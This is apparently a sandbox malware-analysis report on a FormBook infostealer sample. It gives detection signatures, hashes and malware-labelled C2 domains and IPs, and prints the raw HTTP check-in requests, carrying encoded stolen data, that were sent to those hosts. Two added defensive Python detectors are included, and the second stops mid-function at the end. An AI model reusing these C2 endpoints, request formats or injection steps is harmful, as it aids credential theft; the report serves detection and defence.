Windows Analysis Report
Shipment_notification.exe

Overview

General Information

Sample Name: Shipment_notification.exe
Analysis ID: 830738
MD5: c310a64af890ac32abff89e86cb53a33
SHA1: 509cdec4d058011fb55535a936e56d3158f3f05a
SHA256: 90e86051c2fb04a3f6fda85273580abca9a9131fb5e32065f620c4410febe1af
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
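Several of these signatures (creates a process in suspended mode, queues an APC in another process, modifies a thread context, maps memory into a foreign process, system process connects to network) are links of one chain that endpoint telemetry has to stitch back together. The script below is an added example, not part of the Joe Sandbox report: it correlates Sysmon-style events (ID 1 ProcessCreate, ID 10 ProcessAccess, ID 3 NetworkConnect) into that chain. The event records are constructed to mirror this report's process set (the sample as process 2, explorer.exe as 3, control.exe as 4, matching the memory-dump prefixes further down); the timestamps, the parent of control.exe, the benign records and the rule names are assumptions.

```python
"""Correlate Sysmon-style process and network events into an injection chain.

Added example, not part of the Joe Sandbox report. Event shapes follow Sysmon
(ID 1 ProcessCreate, ID 10 ProcessAccess, ID 3 NetworkConnect). SAMPLE_EVENTS are
constructed to mirror this report's process set (sample = process 2, explorer.exe = 3,
control.exe = 4); timestamps, the parent of control.exe, the benign records and the
rule names are assumptions.
"""

# Win32 process access rights needed to write a payload into another process.
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_VM_OPERATION | PROCESS_VM_WRITE  # PROCESS_ALL_ACCESS (0x1FFFFF) includes both

WINDOWS_DIR = "c:\\windows\\"


def is_windows_binary(image: str) -> bool:
    """True for images under C:\\Windows, e.g. explorer.exe or System32\\control.exe."""
    return image.lower().startswith(WINDOWS_DIR)


def correlate(events):
    """Return alerts, in time order, for three links of the chain: a non-Windows image
    spawns a Windows binary; a non-Windows image takes a write-capable handle on a
    Windows process; a Windows process that received such a handle then connects out."""
    alerts = []
    injected = {}  # target pid -> image that obtained write access to it
    for ev in sorted(events, key=lambda e: e["ts"]):
        eid = ev["event_id"]
        if eid == 1 and is_windows_binary(ev["image"]) and not is_windows_binary(ev["parent_image"]):
            alerts.append({"rule": "windows-binary-spawned-by-user-process", "ts": ev["ts"],
                           "source": ev["parent_image"], "target": ev["image"]})
        elif eid == 10 and (ev["granted_access"] & INJECT_MASK) == INJECT_MASK \
                and is_windows_binary(ev["target_image"]) and not is_windows_binary(ev["source_image"]):
            injected[ev["target_pid"]] = ev["source_image"]
            alerts.append({"rule": "write-access-to-windows-process", "ts": ev["ts"],
                           "source": ev["source_image"], "target": ev["target_image"],
                           "granted_access": hex(ev["granted_access"])})
        elif eid == 3 and ev["pid"] in injected and is_windows_binary(ev["image"]):
            alerts.append({"rule": "injected-windows-process-network-connect", "ts": ev["ts"],
                           "source": injected[ev["pid"]], "target": ev["image"],
                           "dest": f"{ev['dest_ip']}:{ev['dest_port']}"})
    return alerts


SAMPLE = r"C:\Users\user\Desktop\Shipment_notification.exe"
EXPLORER = r"C:\Windows\explorer.exe"
CONTROL = r"C:\Windows\System32\control.exe"

SAMPLE_EVENTS = [  # constructed records, not the sandbox's own log
    {"ts": 1, "event_id": 1, "pid": 2, "image": SAMPLE, "parent_pid": 3, "parent_image": EXPLORER},
    {"ts": 2, "event_id": 10, "source_pid": 2, "source_image": SAMPLE,
     "target_pid": 3, "target_image": EXPLORER, "granted_access": 0x1FFFFF},
    {"ts": 3, "event_id": 1, "pid": 4, "image": CONTROL, "parent_pid": 2, "parent_image": SAMPLE},
    {"ts": 4, "event_id": 10, "source_pid": 2, "source_image": SAMPLE,
     "target_pid": 4, "target_image": CONTROL, "granted_access": 0x1FFFFF},
    {"ts": 5, "event_id": 3, "pid": 3, "image": EXPLORER, "dest_ip": "199.59.243.223", "dest_port": 80},
    # Benign noise: a service connecting out, and a user-mode app holding a query-only handle.
    {"ts": 6, "event_id": 3, "pid": 7, "image": r"C:\Windows\System32\svchost.exe",
     "dest_ip": "20.42.73.29", "dest_port": 443},
    {"ts": 7, "event_id": 10, "source_pid": 8, "source_image": r"C:\Program Files\Vendor\agent.exe",
     "target_pid": 3, "target_image": EXPLORER, "granted_access": 0x1000},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Sysmon only emits ID 10 for targets its configuration lists, and common baseline configurations log it for lsass.exe but not for explorer.exe or arbitrary System32 binaries, so the second and third rules fire only if the config includes those targets. The last rule is the one that maps to "System process connects to network (likely due to code injection or exploit)" above; on its own, explorer.exe talking to port 80 is ordinary, which is why the alert is keyed to a prior write-capable handle from a non-Windows image.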

Classification

AV Detection

Source: Shipment_notification.exe ReversingLabs: Detection: 39%
Source: Shipment_notification.exe Virustotal: Detection: 43%
Source: Yara match File source: 2.2.Shipment_notification.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.Shipment_notification.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.377445989.0000000001510000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.377228453.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.580922850.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.578168386.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.577613473.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: http://www.searchvity.com/?dn= URL Reputation: Label: malware
Source: http://www.ywtxsm.com/rs5b/Pr Avira URL Cloud: Label: malware
Source: http://www.searchvity.com/ URL Reputation: Label: malware
Source: http://www.peramid.xyz/rs5b/?uyxvg=pPgXS4BiopaVkxB77nB8m5BmJKRgxbtyTgQ51TCNvvWiqwh2ZJ0SiqT/1xVf5TTVOW5skWvYLryZyUzfOZLrBqpWBEotOTgmwg==&L6HRe=HinkmsLDjhA Avira URL Cloud: Label: malware
Source: http://www.isabellagambitta.com/rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU Avira URL Cloud: Label: phishing
Source: http://www.drkathleensanders.com/rs5b/ Avira URL Cloud: Label: malware
Source: http://www.peramid.xyz/rs5b/ Avira URL Cloud: Label: malware
Source: http://www.piergitarshoes.com/rs5b/ Avira URL Cloud: Label: malware
Source: http://www.amirah.cfd Avira URL Cloud: Label: phishing
Source: http://www.amirah.cfd/rs5b/ Avira URL Cloud: Label: malware
Source: http://www.ywtxsm.com/rs5b/ Avira URL Cloud: Label: malware
Source: http://www.locationsbormes.com/rs5b/?uyxvg=5nmvRd2KsNrJ1ILohWvWv9G51OYC+JQySj/wVW5HrbzlASqN8826SlrC1uxl2FZ0KA9XHqewj3KetP3L0XT9wGstOg81NIph5g==&L6HRe=HinkmsLDjhA Avira URL Cloud: Label: malware
Source: http://www.isabellagambitta.com/rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU+FR3ZDcTynpB6gZNcuxnLmHu8DrupdLy2Rvx2rp5ka04f5VlwEigsTcDnoyRb/ht4uYCIEoQzcZzfMnw==&L6HRe=HinkmsLDjhA Avira URL Cloud: Label: phishing
Source: http://www.isabellagambitta.com/rs5b/ Avira URL Cloud: Label: phishing
Source: http://www.ywtxsm.com/rs5b/?uyxvg=CESO3iylK7QUfFCiUFLwHXxmSIHW1gBrGCjGxLpE4g3q3SI6yIOiTvn7qrQa9OdkrAgYihNybI2hWOHGXNYRIortSIS8Lcg0Kg==&L6HRe=HinkmsLDjhA Avira URL Cloud: Label: malware
Source: http://www.peramid.xyz Avira URL Cloud: Label: malware
Source: http://www.53876.world Avira URL Cloud: Label: malware
Source: http://www.drkathleensanders.com/rs5b/?uyxvg=Sr3AwP9Ski0v59cQ3JwcPDLo9I+EFZxtPOrHknZVg/8QV/fIqaYOT5hsTQMwMe6TSfps7iDWaOg2o/5pI6PYy1hDK243b9ADKw==&L6HRe=HinkmsLDjhA Avira URL Cloud: Label: malware
Source: http://www.53876.world/rs5b/ Avira URL Cloud: Label: malware
Source: http://www.locationsbormes.com/rs5b/ Avira URL Cloud: Label: malware
Source: http://www.carcosainvest.com/rs5b/ Avira URL Cloud: Label: malware
Source: Shipment_notification.exe Joe Sandbox ML: detected
Source: 2.2.Shipment_notification.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: Shipment_notification.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Shipment_notification.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: CYYO.pdb source: Shipment_notification.exe
Source: Binary string: wntdll.pdbUGP source: Shipment_notification.exe, 00000002.00000003.336325695.0000000001924000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000003.333262180.0000000001790000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004C0F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.377463775.00000000047C0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.379237530.0000000004950000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: control.pdb source: Shipment_notification.exe, 00000002.00000002.378125022.0000000001A80000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Shipment_notification.exe, Shipment_notification.exe, 00000002.00000003.336325695.0000000001924000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000003.333262180.0000000001790000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004C0F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.377463775.00000000047C0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.379237530.0000000004950000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CYYO.pdbSHA256 source: Shipment_notification.exe
Source: Binary string: control.pdbUGP source: Shipment_notification.exe, 00000002.00000002.378125022.0000000001A80000.00000040.10000000.00040000.00000000.sdmp

Networking

Source: C:\Windows\explorer.exe Network Connect: 206.54.190.30 80
Source: C:\Windows\explorer.exe Network Connect: 154.218.155.8 80
Source: C:\Windows\explorer.exe Domain query: www.tcatelier.com
Source: C:\Windows\explorer.exe Network Connect: 199.59.243.223 80
Source: C:\Windows\explorer.exe Network Connect: 45.114.105.2 80
Source: C:\Windows\explorer.exe Domain query: www.carcosainvest.com
Source: C:\Windows\explorer.exe Domain query: www.locationsbormes.com
Source: C:\Windows\explorer.exe Domain query: www.peramid.xyz
Source: C:\Windows\explorer.exe Network Connect: 198.177.124.57 80
Source: C:\Windows\explorer.exe Domain query: www.piergitarshoes.com
Source: C:\Windows\explorer.exe Domain query: www.emagrecarapido.store
Source: C:\Windows\explorer.exe Domain query: www.isabellagambitta.com
Source: C:\Windows\explorer.exe Network Connect: 185.27.134.217 80
Source: C:\Windows\explorer.exe Network Connect: 66.96.161.158 80
Source: C:\Windows\explorer.exe Domain query: www.ywtxsm.com
Source: C:\Windows\explorer.exe Domain query: www.amirah.cfd
Source: C:\Windows\explorer.exe Domain query: www.drkathleensanders.com
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 199.59.243.223:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 199.59.243.223:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49702 -> 199.59.243.223:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 154.218.155.8:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 154.218.155.8:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49704 -> 154.218.155.8:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49706 -> 198.177.124.57:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49706 -> 198.177.124.57:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49706 -> 198.177.124.57:80
Source: C:\Windows\explorer.exe DNS query: www.peramid.xyz
Source: Joe Sandbox View ASN Name: FINALFRONTIERVG FINALFRONTIERVG
Source: Joe Sandbox View ASN Name: WZCOM-US WZCOM-US
Source: global traffic HTTP traffic detected:
    GET /rs5b/?uyxvg=CsXC0bU6YgbK4v/ikU+FR3ZDcTynpB6gZNcuxnLmHu8DrupdLy2Rvx2rp5ka04f5VlwEigsTcDnoyRb/ht4uYCIEoQzcZzfMnw==&L6HRe=HinkmsLDjhA HTTP/1.1
    Host: www.isabellagambitta.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic HTTP traffic detected:
    GET /rs5b/?uyxvg=Sr3AwP9Ski0v59cQ3JwcPDLo9I+EFZxtPOrHknZVg/8QV/fIqaYOT5hsTQMwMe6TSfps7iDWaOg2o/5pI6PYy1hDK243b9ADKw==&L6HRe=HinkmsLDjhA HTTP/1.1
    Host: www.drkathleensanders.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic HTTP traffic detected:
    GET /rs5b/?uyxvg=nOUSwineJuxPGPhQvt4EE68jEsCX+f+F3Zzf53EwbVXghGVs+qBfV9lnV789trdHPD+OYXwXTJgtqB6myIQJ1SqB2q7gB4Y0Vw==&L6HRe=HinkmsLDjhA HTTP/1.1
    Host: www.carcosainvest.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic HTTP traffic detected:
    GET /rs5b/?uyxvg=zhbsihX/pGFJaZpy6dND3H78PJ7JxpKHxXOuen1DNaNorGCumHf7SvafvJLlAK1tbLNpDx0WdS8kjnRSnmRz/gORsH5hLjUWLg==&L6HRe=HinkmsLDjhA HTTP/1.1
    Host: www.piergitarshoes.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic HTTP traffic detected:
    GET /rs5b/?uyxvg=CESO3iylK7QUfFCiUFLwHXxmSIHW1gBrGCjGxLpE4g3q3SI6yIOiTvn7qrQa9OdkrAgYihNybI2hWOHGXNYRIortSIS8Lcg0Kg==&L6HRe=HinkmsLDjhA HTTP/1.1
    Host: www.ywtxsm.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic HTTP traffic detected:
    GET /rs5b/?uyxvg=pPgXS4BiopaVkxB77nB8m5BmJKRgxbtyTgQ51TCNvvWiqwh2ZJ0SiqT/1xVf5TTVOW5skWvYLryZyUzfOZLrBqpWBEotOTgmwg==&L6HRe=HinkmsLDjhA HTTP/1.1
    Host: www.peramid.xyz
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic HTTP traffic detected:
    GET /rs5b/?uyxvg=5nmvRd2KsNrJ1ILohWvWv9G51OYC+JQySj/wVW5HrbzlASqN8826SlrC1uxl2FZ0KA9XHqewj3KetP3L0XT9wGstOg81NIph5g==&L6HRe=HinkmsLDjhA HTTP/1.1
    Host: www.locationsbormes.com
    Connection: close
    Data Raw: 00 00 00 00 00 00 00
    Data Ascii:
Source: global traffic HTTP traffic detected:
    POST /rs5b/ HTTP/1.1
    Host: www.drkathleensanders.com
    Connection: close
    Content-Length: 187
    Cache-Control: no-cache
    Origin: http://www.drkathleensanders.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.drkathleensanders.com/rs5b/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    Data Raw: 75 79 78 76 67 3d 66 70 66 67 7a 34 4e 43 73 48 6c 68 7e 65 63 75 77 4a 74 64 64 68 50 6d 32 62 50 51 50 62 52 4e 42 73 7a 41 68 44 35 47 76 50 34 5a 63 75 37 6a 6c 62 46 37 55 38 67 6e 62 44 30 6d 42 5a 7e 41 4c 65 63 52 79 43 58 65 4e 74 34 6b 6c 39 6c 77 55 4b 37 41 75 56 35 58 66 6b 77 51 65 75 30 61 43 7a 69 65 73 53 47 4e 66 68 7a 34 6e 43 61 56 4e 30 43 6d 75 63 39 56 7e 32 6e 4d 37 4b 4b 44 7e 65 79 67 6e 73 6d 4d 77 58 68 77 47 4b 68 65 33 4b 47 72 52 78 49 43 5a 49 7e 6b 4d 72 43 4d 6c 43 73 7a 32 37 59 43 28 74 58 35 49 44 65 38 43 41 29 2e 00 00 00 00 00 00 00 00
    Data Ascii: uyxvg=fpfgz4NCsHlh~ecuwJtddhPm2bPQPbRNBszAhD5GvP4Zcu7jlbF7U8gnbD0mBZ~ALecRyCXeNt4kl9lwUK7AuV5XfkwQeu0aCziesSGNfhz4nCaVN0Cmuc9V~2nM7KKD~eygnsmMwXhwGKhe3KGrRxICZI~kMrCMlCsz27YC(tX5IDe8CA).
Source: global traffic HTTP traffic detected:
    POST /rs5b/ HTTP/1.1
    Host: www.carcosainvest.com
    Connection: close
    Content-Length: 187
    Cache-Control: no-cache
    Origin: http://www.carcosainvest.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.carcosainvest.com/rs5b/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    Data Raw: 75 79 78 76 67 3d 71 4d 38 79 7a 57 54 77 55 4a 41 42 4c 39 4a 59 6b 2d 38 44 5a 34 4d 5f 54 66 79 45 38 38 7e 44 37 73 37 4e 7e 45 63 5a 58 6b 58 6b 70 33 31 6c 7e 4c 35 76 55 39 64 7a 4b 4b 41 51 70 70 42 45 49 54 72 35 65 54 41 50 54 72 30 35 67 44 32 4d 76 62 49 37 72 41 57 43 6f 4a 6a 69 55 2d 38 52 54 4f 4d 4c 7e 34 57 53 4e 4a 73 7a 71 75 6c 30 48 4c 65 6f 33 5f 43 51 66 69 28 51 63 73 35 7a 70 58 59 49 37 77 79 46 77 4a 72 64 65 71 28 53 32 61 57 5f 77 56 63 71 36 38 46 77 45 46 57 4e 67 67 52 5f 65 54 6a 64 6c 56 39 4d 79 6e 47 50 49 67 29 2e 00 00 00 00 00 00 00 00
    Data Ascii: uyxvg=qM8yzWTwUJABL9JYk-8DZ4M_TfyE88~D7s7N~EcZXkXkp31l~L5vU9dzKKAQppBEITr5eTAPTr05gD2MvbI7rAWCoJjiU-8RTOML~4WSNJszqul0HLeo3_CQfi(Qcs5zpXYI7wyFwJrdeq(S2aW_wVcq68FwEFWNggR_eTjdlV9MynGPIg).
Source: global traffic HTTP traffic detected:
    POST /rs5b/ HTTP/1.1
    Host: www.piergitarshoes.com
    Connection: close
    Content-Length: 187
    Cache-Control: no-cache
    Origin: http://www.piergitarshoes.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.piergitarshoes.com/rs5b/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    Data Raw: 75 79 78 76 67 3d 7e 6a 7a 4d 68 55 53 42 31 53 6c 4b 58 34 70 66 36 72 63 33 71 6e 54 4d 49 49 61 59 7e 6f 7e 41 69 46 47 35 65 45 4a 54 44 62 46 74 39 45 4b 6c 33 33 76 75 4d 73 66 55 76 37 62 61 44 61 70 32 4d 4c 59 50 43 51 51 5f 4c 69 67 31 73 43 31 77 30 44 74 75 6e 7a 4f 72 70 32 68 4a 46 69 6f 4d 4c 4b 34 46 4b 78 48 4f 51 71 6d 4a 6c 34 44 4f 51 79 46 62 6d 4e 67 5f 34 51 50 33 47 79 71 59 37 4f 68 6a 49 59 39 34 42 7a 5a 4c 71 6a 31 64 51 33 34 48 4f 69 39 44 46 6f 59 72 38 77 57 54 28 34 6d 51 51 77 7a 62 71 73 6e 37 6a 7a 4a 59 35 67 29 2e 00 00 00 00 00 00 00 00
    Data Ascii: uyxvg=~jzMhUSB1SlKX4pf6rc3qnTMIIaY~o~AiFG5eEJTDbFt9EKl33vuMsfUv7baDap2MLYPCQQ_Lig1sC1w0DtunzOrp2hJFioMLK4FKxHOQqmJl4DOQyFbmNg_4QP3GyqY7OhjIY94BzZLqj1dQ34HOi9DFoYr8wWT(4mQQwzbqsn7jzJY5g).
Source: global traffic HTTP traffic detected:
    POST /rs5b/ HTTP/1.1
    Host: www.ywtxsm.com
    Connection: close
    Content-Length: 187
    Cache-Control: no-cache
    Origin: http://www.ywtxsm.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.ywtxsm.com/rs5b/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    Data Raw: 75 79 78 76 67 3d 50 47 36 75 30 55 43 37 51 4e 52 56 53 32 47 4a 65 45 36 54 64 48 56 4b 51 63 4c 6d 38 69 46 35 4b 68 72 68 34 70 35 58 31 68 37 7a 79 51 30 4c 28 35 6a 4d 56 66 28 6a 74 5a 55 55 32 59 35 39 39 42 6c 77 76 68 35 53 61 59 32 7a 5a 73 44 4b 57 39 5a 49 5a 4c 58 54 4d 70 6e 76 65 75 49 48 54 49 66 50 56 33 59 4e 38 66 62 61 42 6d 4c 32 4f 45 4e 77 69 69 69 58 4d 4e 34 4d 78 5a 6e 68 30 6c 62 35 72 6d 39 79 31 6b 56 6c 73 30 79 69 77 63 61 41 4b 54 36 79 59 78 6a 42 42 52 6d 51 77 49 48 64 72 77 37 43 42 73 58 41 34 30 72 58 66 51 29 2e 00 00 00 00 00 00 00 00
    Data Ascii: uyxvg=PG6u0UC7QNRVS2GJeE6TdHVKQcLm8iF5Khrh4p5X1h7zyQ0L(5jMVf(jtZUU2Y599Blwvh5SaY2zZsDKW9ZIZLXTMpnveuIHTIfPV3YN8fbaBmL2OENwiiiXMN4MxZnh0lb5rm9y1kVls0yiwcaAKT6yYxjBBRmQwIHdrw7CBsXA40rXfQ).
Source: global traffic HTTP traffic detected:
    POST /rs5b/ HTTP/1.1
    Host: www.peramid.xyz
    Connection: close
    Content-Length: 187
    Cache-Control: no-cache
    Origin: http://www.peramid.xyz
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.peramid.xyz/rs5b/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    Data Raw: 75 79 78 76 67 3d 6b 4e 49 33 52 4d 52 50 72 2d 32 47 68 42 4a 56 37 6b 51 76 38 65 6c 30 46 72 73 77 79 61 70 38 57 56 55 6f 38 77 6d 63 70 74 71 6e 6a 45 35 41 52 4f 45 5a 74 71 37 46 74 54 4e 49 28 78 44 55 61 6c 73 70 6e 33 28 37 56 70 61 79 7a 6c 6a 58 59 72 4c 30 51 35 46 7a 53 6d 49 73 4e 78 55 5f 37 2d 56 34 4c 36 71 36 73 61 70 79 32 4f 65 57 32 74 46 57 66 7a 5a 6e 56 50 4d 55 52 75 44 41 7e 50 65 4c 34 61 74 77 6e 52 31 4b 79 41 63 71 6a 32 77 67 57 44 38 75 43 6f 58 6f 33 4d 7e 44 41 45 62 73 37 46 69 45 68 65 54 75 66 66 54 4c 4f 77 29 2e 00 00 00 00 00 00 00 00
    Data Ascii: uyxvg=kNI3RMRPr-2GhBJV7kQv8el0Frswyap8WVUo8wmcptqnjE5AROEZtq7FtTNI(xDUalspn3(7VpayzljXYrL0Q5FzSmIsNxU_7-V4L6q6sapy2OeW2tFWfzZnVPMURuDA~PeL4atwnR1KyAcqj2wgWD8uCoXo3M~DAEbs7FiEheTuffTLOw).
Source: global traffic HTTP traffic detected:
    POST /rs5b/ HTTP/1.1
    Host: www.locationsbormes.com
    Connection: close
    Content-Length: 187
    Cache-Control: no-cache
    Origin: http://www.locationsbormes.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://www.locationsbormes.com/rs5b/
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    Data Raw: 75 79 78 76 67 3d 30 6c 4f 50 53 70 4b 5f 76 35 50 62 6b 37 28 30 67 52 4f 57 79 65 79 61 37 4f 67 44 79 65 59 63 57 6e 58 6f 56 43 35 53 76 72 76 68 4e 42 61 37 30 4c 4b 57 61 58 37 7a 32 63 78 32 31 69 42 77 59 52 35 53 4f 5f 72 70 36 58 71 50 68 4e 43 7a 69 6e 50 41 6f 56 45 61 52 41 49 77 59 2d 42 54 34 41 79 42 64 72 39 66 6a 6a 54 52 50 65 6d 78 55 48 7e 6f 4e 47 4b 37 5a 49 77 62 52 68 51 30 7e 79 61 61 42 5f 77 76 41 32 67 71 42 65 34 77 66 6a 70 74 7e 45 63 31 6d 34 59 58 4b 4c 74 50 39 38 79 55 50 75 57 4e 72 55 7a 52 45 53 56 33 74 41 29 2e 00 00 00 00 00 00 00 00
    Data Ascii: uyxvg=0lOPSpK_v5Pbk7(0gROWyeya7OgDyeYcWnXoVC5SvrvhNBa70LKWaX7z2cx21iBwYR5SO_rp6XqPhNCzinPAoVEaRAIwY-BT4AyBdr9fjjTRPemxUH~oNGK7ZIwbRhQ0~yaaB_wvA2gqBe4wfjpt~Ec1m4YXKLtP98yUPuWNrUzRESV3tA).
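Every request above has the same shape: one short alphanumeric path segment, a single long base64-like blob under a parameter name that is fixed for this build, Connection: close, no User-Agent at all on the GET, and on the POST a hard-coded IE11 User-Agent with Origin and Referer pointing back at the check-in URL. The script below is an added example, not part of this report and not one of the Emerging Threats rules that fired above; it scores requests on those structural features instead of on the literal "/rs5b/" and "uyxvg", which differ between FormBook builds. The two malicious records are copied from the report's GET to www.isabellagambitta.com and POST to www.drkathleensanders.com; the two benign records, the 3-6 character path length and the alert threshold of 4 are this example's assumptions.

```python
"""Score HTTP requests for the structural FormBook check-in shape.

Added example, not part of the Joe Sandbox report and not an Emerging Threats rule.
The two malicious records in SAMPLE_REQUESTS are copied from this report; the benign
records, the 3-6 character path length and the threshold of 4 are assumptions.
"""
import re
from urllib.parse import urlsplit

# One short alphanumeric path segment ("/rs5b/" here). Segment and parameter names
# change between builds, so nothing below keys on the literal strings.
SHORT_PATH = re.compile(r"^/[A-Za-z0-9]{3,6}/$")
STD_B64 = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")        # GET blob: standard base64
FORMBOOK_B64 = re.compile(r"^[A-Za-z0-9\-_~()]{40,}\.?$")   # POST blob: letters, digits, - _ ~ ( ), optional final dot
SHORT_TOKEN = re.compile(r"^[A-Za-z0-9]{4,16}$")
IE11_WIN10_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko"


def raw_params(s: str):
    """Split k=v&k=v without percent or plus decoding, which would corrupt base64."""
    pairs = []
    for part in s.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def score_request(req):
    """Return (score, reasons): one point per structural feature of the check-in."""
    headers = {k.lower(): v for k, v in req["headers"].items()}
    url = urlsplit(req["uri"])
    if not SHORT_PATH.match(url.path):
        return 0, []
    reasons = ["single short alphanumeric path segment"]
    if headers.get("connection", "").lower() == "close":
        reasons.append("Connection: close")
    if req["method"] == "GET":
        params = raw_params(url.query)
        if len(params) == 2 and STD_B64.match(params[0][1]) and SHORT_TOKEN.match(params[1][1]):
            reasons.append("two-parameter query: long base64 blob then short token")
        if "user-agent" not in headers:
            reasons.append("GET without User-Agent")
    elif req["method"] == "POST":
        params = raw_params(req.get("body", ""))
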